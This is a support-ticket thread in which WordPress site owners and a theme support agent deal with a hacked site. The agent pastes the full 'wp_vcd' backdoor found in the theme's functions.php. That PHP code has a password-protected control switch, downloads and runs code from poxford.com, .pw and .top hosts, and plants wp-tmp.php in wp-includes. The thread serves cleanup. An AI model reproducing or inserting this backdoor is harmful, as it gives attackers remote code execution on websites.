Hey, we're seeing a recent error display on the live site [and backend]:
Notice: Use of undefined constant REQUEST_URI - assumed 'REQUEST_URI' in /home/[removed]/public_html/wp-content/themes/thegem-child/functions.php on line 73
I removed malicious code from the functions.php of the mail theme and child theme. You need to check all the themes you installed and remove this code:
All the themes currently installed are from WordPress, but If anyone else is curious we've deleted the following themes completely:
SocialMag
Leto
PhotoBlogster
ClubFitness
We only have TheGem + Child Theme and WordPress' Twenty Fifteen, Sixteen, and Seventeen default themes. Lets us know if we should scan/delete those as well. We did not install those, they came with WordPress.
Should we install a security plugin? What do you recommend we do now?
Thank you very much. All themes are from WordPress repository but I will change my FTP & WP admin pass now. Did you also find the malicious code in one of our plugins?
We are still unsure where the hack came from. We don't know how to really prevent this in the future.
Hey, we're seeing a recent error display on the live site [and backend]:
Notice: Use of undefined constant REQUEST_URI - assumed 'REQUEST_URI' in /home/[removed]/public_html/wp-content/themes/thegem-child/functions.php on line 73
- Line 73:
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
- Line 70 - 87:
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
Hi,
You site had been hacked.
I removed malicious code from the functions.php of the mail theme and child theme. You need to check all the themes you installed and remove this code:
<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'c3538061d6bf79239fd56bdddba9974d')) { $div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain)) { $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; case 'change_code'; if (isset($_REQUEST['newcode'])) { if (!empty($_REQUEST['newcode'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode)) { $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); } $div_code_name = "wp_vcd"; $funcfile = __FILE__; if(!function_exists('theme_temp_setup')) { $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); if( fwrite($handle, "<?php\n" . $phpCode)) { } else { $tmpfname = tempnam('./', "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); } fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } $wp_auth_key='b3de80aaa27f65938be458451c3ac075'; if (($tmpcontent = @file_get_contents("http://www.poxford.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.poxford.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.poxford.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif (($tmpcontent = @file_get_contents("http://www.poxford.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.poxford.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } } } //$start_wp_theme_tmp //wp_tmp //$end_wp_theme_tmp ?>Please note if you comment on your ticket before we reply, your ticket will be pushed down of the tickets list.
Regards, Oliver
Thank you so much Gregor!
All the themes currently installed are from WordPress, but If anyone else is curious we've deleted the following themes completely:
We only have TheGem + Child Theme and WordPress' Twenty Fifteen, Sixteen, and Seventeen default themes. Lets us know if we should scan/delete those as well. We did not install those, they came with WordPress.
Should we install a security plugin? What do you recommend we do now?
Try to download all the wordpress to your PC and search:
So you'll see where malicious code added... After remove it on your server.
Please note if you comment on your ticket before we reply, your ticket will be pushed down of the tickets list.
Regards, Oliver
I can't search directly in files using FileZilla (FTP).
I'm recommended to use something called SSH and
grep -rli "searchstring" *Can I copy the entire public_html folder from FileZilla to my PC and search using windows explorer?
Yes.
Please note if you comment on your ticket before we reply, your ticket will be pushed down of the tickets list.
Regards, Oliver
No, you didn't remove it, example:
/public_html/wp-content/themes/twentysixteen/functions.php
In the top
Please note if you comment on your ticket before we reply, your ticket will be pushed down of the tickets list.
Regards, Oliver
Change the pass to FTP and WP admin and don't install the themes and plugins from the unverified sources.
Please note if you comment on your ticket before we reply, your ticket will be pushed down of the tickets list.
Regards, Oliver
Thank you very much. All themes are from WordPress repository but I will change my FTP & WP admin pass now. Did you also find the malicious code in one of our plugins?
We are still unsure where the hack came from. We don't know how to really prevent this in the future.
I didn't looked in the plugins. You need to find malicious code yourself.
Please note if you comment on your ticket before we reply, your ticket will be pushed down of the tickets list.
Regards, Oliver
um...?? I was not asking you to check my plugins. You said not to install plugins from unverified sources...
You made it sound like you had found something malicious.
But thanks anyway i guess
Hi,
Most likely you got this issue from the one of the third-party plugin. So in my mind you need to check folder:
/wp-content/plugins
Deeply.
Please note if you comment on your ticket before we reply, your ticket will be pushed down of the tickets list.
Regards, Oliver